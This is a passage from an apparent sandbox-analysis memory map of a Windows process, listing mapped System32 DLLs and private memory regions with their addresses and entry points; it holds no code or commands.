"\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 989 start_va = 0x737a0000 end_va = 0x73806fff monitored = 0 entry_point = 0x737a7b26 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 990 start_va = 0x73810000 end_va = 0x7381afff monitored = 0 entry_point = 0x738152a0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 991 start_va = 0x73820000 end_va = 0x73837fff monitored = 0 entry_point = 0x73821335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 992 start_va = 0x73840000 end_va = 0x738e5fff monitored = 0 entry_point = 0x738aa2f0 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 993 start_va = 0x73920000 end_va = 0x73933fff monitored = 0 entry_point = 0x73921464 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 994 start_va = 0x73940000 end_va = 0x7397afff monitored = 0 entry_point = 0x73941350 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 995 start_va = 0x73980000 end_va = 0x7399afff monitored = 0 entry_point = 0x739813b0 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 996 start_va = 0x739a0000 end_va = 0x739cbfff monitored = 0 entry_point = 0x739a14a5 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 997 start_va = 0x739d0000 end_va = 0x73a01fff monitored = 0 entry_point = 0x739f0274 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 998 start_va = 0x73a10000 end_va = 0x73a42fff monitored = 0 entry_point = 0x73a11462 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 999 start_va = 0x73a50000 end_va = 0x73a5cfff monitored = 0 entry_point = 0x73a51326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1000 start_va = 0x73a60000 end_va = 0x73adcfff monitored = 0 entry_point = 0x73a727c0 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1001 start_va = 0x73ae0000 end_va = 0x73b40fff monitored = 0 entry_point = 0x73b1bf40 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1002 start_va = 0x73b60000 end_va = 0x73b6efff monitored = 0 entry_point = 0x73b64427 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1003 start_va = 0x73b70000 end_va = 0x73bb6fff monitored = 0 entry_point = 0x73b889f9 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1004 start_va = 0x73bc0000 end_va = 0x73bc9fff monitored = 0 entry_point = 0x73bc4d20 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1005 start_va = 0x73bd0000 end_va = 0x73bd8fff monitored = 0 entry_point = 0x73bd1229 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1006 start_va = 0x73be0000 end_va = 0x73bebfff monitored = 0 entry_point = 0x73be45c2 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1007 start_va = 0x73bf0000 end_va = 0x73c03fff monitored = 0 entry_point = 0x73bf1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1008 start_va = 0x73c10000 end_va = 0x73c3afff monitored = 0 entry_point = 0x73c17a69 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1009 start_va = 0x73c80000 end_va = 0x73c8ffff monitored = 0 entry_point = 0x73c838c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1010 start_va = 0x73c90000 end_va = 0x73d22fff monitored = 0 entry_point = 0x73c91595 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1011 start_va = 0x73e70000 end_va = 0x73e75fff monitored = 0 entry_point = 0x73e71150 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1012 start_va = 0x73fa0000 end_va = 0x73faefff monitored = 0 entry_point = 0x73fa125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1013 start_va = 0x73fb0000 end_va = 0x73fbefff monitored = 0 entry_point = 0x73fb12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1014 start_va = 0x73fc0000 end_va = 0x73fc8fff monitored = 0 entry_point = 0x73fc15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1015 start_va = 0x73fd0000 end_va = 0x73fe0fff monitored = 0 entry_point = 0x73fd1300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1016 start_va = 0x73ff0000 end_va = 0x7401efff monitored = 0 entry_point = 0x7400c4c0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1017 start_va = 0x740d0000 end_va = 0x740dcfff monitored = 0 entry_point = 0x740d11e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1018 start_va = 0x740e0000 end_va = 0x740ecfff monitored = 0 entry_point = 0x740e1375 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1019 start_va = 0x741f0000 end_va = 0x7421efff monitored = 0 entry_point = 0x741f1142 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1020 start_va = 0x744d0000 end_va = 0x7466dfff monitored = 0 entry_point = 0x744fe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1021 start_va = 0x74870000 end_va = 0x748affff monitored = 0 entry_point = 0x7487a2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1022 start_va = 0x748b0000 end_va = 0x748c1fff monitored = 0 entry_point = 0x748b4795 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1023 start_va = 0x74a10000 end_va = 0x74a16fff monitored = 0 entry_point = 0x74a110c0 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1024 start_va = 0x74a20000 end_va = 0x74b14fff monitored = 0 entry_point = 0x74a30d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1025 start_va = 0x74c10000 end_va = 0x74c30fff monitored = 0 entry_point = 0x74c1145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1026 start_va = 0x74d50000 end_va = 0x74d58fff monitored = 0 entry_point = 0x74d51220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1027 start_va = 0x74d60000 end_va = 0x74dd5fff monitored = 0 entry_point = 0x74d6760e region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1028 start_va = 0x74de0000 end_va = 0x74de4fff monitored = 0 entry_point = 0x74de15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1029 start_va = 0x74e60000 end_va = 0x74e6afff monitored = 0 entry_point = 0x74e6129b region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 1030 start_va = 0x74e90000 end_va = 0x74ea5fff monitored = 0 entry_point = 0x74e92061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1031 start_va = 0x74eb0000 end_va = 0x74ec6fff monitored = 0 entry_point = 0x74eb1c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1032 start_va = 0x74ed0000 end_va = 0x74ee4fff monitored = 0 entry_point = 0x74ed3dd9 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 1033 start_va = 0x74f70000 end_va = 0x74f9bfff monitored = 0 entry_point = 0x74f7e9eb region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1034 start_va = 0x74fa0000 end_va = 0x74fa7fff monitored = 0 entry_point = 0x74fa34d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1035 start_va = 0x75050000 end_va = 0x7505dfff monitored = 0 entry_point = 0x75051289 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1036 start_va = 0x75070000 end_va = 0x750aafff monitored = 0 entry_point = 0x7507128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1037 start_va = 0x75120000 end_va = 0x75141fff monitored = 0 entry_point = 0x751253e9 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1038 start_va = 0x75150000 end_va = 0x75193fff monitored = 0 entry_point = 0x751663f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1039 start_va = 0x75280000 end_va = 0x75285fff monitored = 0 entry_point = 0x75281673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1040 start_va = 0x75290000 end_va = 0x752cbfff monitored = 0 entry_point = 0x7529145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1041 start_va = 0x752d0000 end_va = 0x752e6fff monitored = 0 entry_point = 0x752d3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1042 start_va = 0x753a0000 end_va = 0x753cafff monitored = 0 entry_point = 0x753a1bfc region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1043 start_va = 0x753e0000 end_va = 0x753e5fff monitored = 0 entry_point = 0x753e22c7 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 1044 start_va = 0x753f0000 end_va = 0x753f6fff monitored = 0 entry_point = 0x753f2e67 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1045 start_va = 0x75400000 end_va = 0x75416fff monitored = 0 entry_point = 0x75403574 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1046 start_va = 0x75460000 end_va = 0x7547afff monitored = 0 entry_point = 0x75461286 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1047 start_va = 0x75490000 end_va = 0x754d1fff monitored = 0 entry_point = 0x75491360 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1048 start_va = 0x754e0000 end_va = 0x754f0fff monitored = 0 entry_point = 0x754e4982 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 1049 start_va = 0x756b0000 end_va = 0x756c8fff monitored = 0 entry_point = 0x756b1319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1050 start_va = 0x75720000 end_va = 0x75727fff monitored = 0 entry_point = 0x757210e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1051 start_va = 0x75740000 end_va = 0x7575afff monitored = 0 entry_point = 0x757493b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1052 start_va = 0x75760000 end_va = 0x7576bfff monitored = 0 entry_point = 0x757610e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1053 start_va = 0x75770000 end_va = 0x757cefff monitored = 0 entry_point = 0x75772134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1054 start_va = 0x757d0000 end_va = 0x757f8fff monitored = 0 entry_point = 0x757d6b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1055 start_va = 0x75800000 end_va = 0x7580dfff monitored = 0 entry_point = 0x75801235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1056 start_va = 0x75810000 end_va = 0x7581afff monitored = 0 entry_point = 0x75811992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1057 start_va = 0x75880000 end_va = 0x7588bfff monitored = 0 entry_point = 0x7588238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1058 start_va = 0x75920000 end_va = 0x7594efff monitored = 0 entry_point = 0x75922a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1059 start_va = 0x75950000 end_va = 0x75a70fff monitored = 0 entry_point = 0x7595158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1060 start_va = 0x75a80000 end_va = 0x75aa6fff monitored = 0 entry_point = 0x75a858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1061 start_va = 0x75ab0000 end_va = 0x75afafff monitored = 0 entry_point = 0x75ab7e10 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1062 start_va = 0x75b00000 end_va = 0x75b11fff monitored = 0 entry_point = 0x75b01441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1063 start_va = 0x75ba0000 end_va = 0x75bedfff monitored = 0 entry_point = 0x75ba9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1064 start_va = 0x75c50000 end_va = 0x75decfff monitored = 0 entry_point = 0x75c517e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1065 start_va = 0x75df0000 end_va = 0x75e90fff monitored = 0 entry_point = 0x75e22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1066 start_va = 0x75ea0000 end_va = 0x75ebefff monitored = 0 entry_point = 0x75ea1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1067 start_va = 0x75ec0000 end_va = 0x75f8bfff monitored = 0 entry_point = 0x75ec168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1068 start_va = 0x75f90000 end_va = 0x75f95fff monitored = 0 entry_point = 0x75f91782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1069 start_va = 0x75fa0000 end_va = 0x75ff6fff monitored = 0 entry_point = 0x75fb9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1070 start_va = 0x76000000 end_va = 0x76034fff monitored = 0 entry_point = 0x7600145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1071 start_va = 0x76040000 end_va = 0x76113fff monitored = 0 entry_point = 0x7608ce6f region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1072 start_va = 0x76120000 end_va = 0x76124fff monitored = 0 entry_point = 0x76121438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1073 start_va = 0x76130000 end_va = 0x761cffff monitored = 0 entry_point = 0x761449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1074 start_va = 0x761d0000 end_va = 0x7626cfff monitored = 0 entry_point = 0x76203fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1075 start_va = 0x76270000 end_va = 0x7631bfff monitored = 0 entry_point = 0x7627a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1076 start_va = 0x76460000 end_va = 0x76478fff monitored = 0 entry_point = 0x76464975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1077 start_va = 0x76480000 end_va = 0x765dbfff monitored = 0 entry_point = 0x764cba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1078 start_va = 0x766e0000 end_va = 0x767a8fff monitored = 0 entry_point = 0x766fd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1079 start_va = 0x767b0000 end_va = 0x767b9fff monitored = 0 entry_point = 0x767b136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1080 start_va = 0x769c0000 end_va = 0x76a4efff monitored = 0 entry_point = 0x769c3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1081 start_va = 0x76a80000 end_va = 0x776c9fff monitored = 0 entry_point = 0x76b01601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1082 start_va = 0x776d0000 end_va = 0x7780bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1083 start_va = 0x77810000 end_va = 0x77892fff monitored = 0 entry_point = 0x778123d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1084 start_va = 0x778b0000 end_va = 0x778f4fff monitored = 0 entry_point = 0x778b11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1085 start_va = 0x77910000 end_va = 0x77910fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1086 start_va = 0x7f6f0000 end_va = 0x7f7effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1087 start_va = 0x7ff8a000 end_va = 0x7ff8afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff8a000" filename = "" Region: id = 1088 start_va = 0x7ff8b000 end_va = 0x7ff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff8b000" filename = "" Region: id = 1089 start_va = 0x7ff8c000 end_va = 0x7ff8cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff8c000" filename = "" Region: id = 1090 start_va = 0x7ff8e000 end_va = 0x7ff8efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff8e000" filename = "" Region: id = 1091 start_va = 0x7ff8f000 end_va = 0x7ff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff8f000" filename = "" Region: id = 1092 start_va = 0x7ff90000 end_va = 0x7ff90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff90000" filename = "" Region: id = 1093 start_va = 0x7ff91000 end_va = 0x7ff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff91000" filename = "" Region: id = 1094 start_va = 0x7ff92000 end_va = 0x7ff92fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff92000" filename = "" Region: id = 1095 start_va = 0x7ff94000 end_va = 0x7ff94fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff94000" filename = "" Region: id = 1096 start_va = 0x7ff95000 end_va = 0x7ff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff95000" filename = "" Region: id = 1097 start_va = 0x7ff96000 end_va = 0x7ff96fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff96000" filename = "" Region: id = 1098 start_va = 0x7ff97000 end_va = 0x7ff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff97000" filename = "" Region: id = 1099 start_va = 0x7ff9a000 end_va = 0x7ff9afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff9a000" filename = "" Region: id = 1100 start_va = 0x7ff9b000 end_va = 0x7ff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff9b000" filename = "" Region: id = 1101 start_va = 0x7ff9d000 end_va = 0x7ff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff9d000" filename = "" Region: id = 1102 start_va = 0x7ff9e000 end_va = 0x7ff9efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff9e000" filename = "" Region: id = 1103 start_va = 0x7ffa1000 end_va = 0x7ffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa1000" filename = "" Region: id = 1104 start_va = 0x7ffa2000 end_va = 0x7ffa2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa2000" filename = "" Region: id = 1105 start_va = 0x7ffa6000 end_va = 0x7ffa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Region: id = 1106 start_va = 0x7ffa7000 end_va = 0x7ffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 1107 start_va = 0x7ffa8000 end_va = 0x7ffa8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 1108 start_va = 0x7ffaa000 end_va = 0x7ffaafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 1109 start_va = 0x7ffab000 end_va = 0x7ffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 1110 start_va = 0x7ffac000 end_va = 0x7ffacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 1111 start_va = 0x7ffad000 end_va = 0x7ffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 1112 start_va = 0x7ffae000 end_va = 0x7ffaefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 1113 start_va = 0x7ffaf000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 1114 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1115 start_va = 0x7ffd3000 end_va = 0x7ffd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 1116 start_va = 0x7ffd4000 end_va = 0x7ffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 1117 start_va = 0x7ffd5000 end_va = 0x7ffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1118 start_va = 0x7ffd6000 end_va = 0x7ffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1119 start_va = 0x7ffd7000 end_va = 0x7ffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1120 start_va = 0x7ffd8000 end_va = 0x7ffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1121 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1122 start_va = 0x7ffda000 end_va = 0x7ffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1123 start_va = 0x7ffdb000 end_va = 